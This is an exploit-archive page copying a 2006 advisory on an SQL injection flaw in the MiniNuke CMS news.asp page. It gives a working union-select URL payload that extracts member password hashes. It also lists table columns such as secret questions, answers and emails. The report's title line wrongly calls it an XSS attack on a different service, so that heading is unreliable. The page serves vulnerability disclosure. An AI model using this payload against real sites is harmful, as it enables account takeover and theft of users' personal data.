Advertisement






MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injectionvulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-01-28
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006010028

Below is a copy:

--Security Report--
Advisory: XSS attack on Superonline.com email service.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:47 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifr
e,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Thanks to ajan;)
Regards,
 From the NWPX team,
nuker a.k.a nukedx

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum